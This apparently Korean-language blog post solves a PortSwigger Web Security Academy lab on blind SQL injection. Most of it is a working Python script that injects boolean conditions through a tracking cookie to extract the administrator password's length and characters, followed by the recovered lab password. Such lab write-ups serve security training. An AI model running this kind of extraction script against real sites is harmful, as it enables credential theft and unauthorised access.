Lab: Blind SQL injection with conditional responses 문제 풀이

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses

Lab: Blind SQL injection with conditional responses | Web Security Academy

 

문제 풀이 과정 중 password 값 구하는 과정이  burup suite을 사용하면 매우 오래걸림 

 

exploit 코드 작성

import requests

# Target details
base_url = "https://0af0007e044f347a83d314fc005100fb.web-security-academy.net"
endpoint = "/filter?category=Tech+gifts"
cookie = {
    "session": "JiN9qGeyRicgKjbx6gF3SBEUVWwVMlJp",
    "TrackingId": "ksooNQBgdn7Erw7G"
}

def find_password_length():
    for length in range(1, 51):  # Testing for a password length up to 50 characters
        injection = f"' AND (SELECT LENGTH(password) FROM users WHERE username = 'administrator') = {length} -- 1"
        cookie['TrackingId'] = "ksooNQBgdn7Erw7G" + injection
        response = requests.get(base_url + endpoint, cookies=cookie)
        if "welcome" in response.text.lower():
            return length
    return 0  # Returns 0 if no length matched

def find_password(length):
    password = ''
    for position in range(1, length + 1):
        for ascii_value in range(32, 127):
            injection = f"' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {position}, 1)) = {ascii_value} -- 1"
            cookie['TrackingId'] = "ksooNQBgdn7Erw7G" + injection
            response = requests.get(base_url + endpoint, cookies=cookie)
            if "welcome" in response.text.lower():
                password += chr(ascii_value)
                print(f"Found character: {password[-1]} at position {position}")
                break
    return password

# Execute the functions
password_length = find_password_length()
if password_length > 0:
    password = find_password(password_length)
    print(f"Recovered password: {password}")
else:
    print("Failed to determine the password length.")

 

https://youtu.be/LBG_n9fr8sM?si=iqIAV1bgNDtyAv5P

위의 영상 참고

 

Recovered password: mdrtk3v8yc9y54ra4o0c

 

답은 다를 수 있습니다.!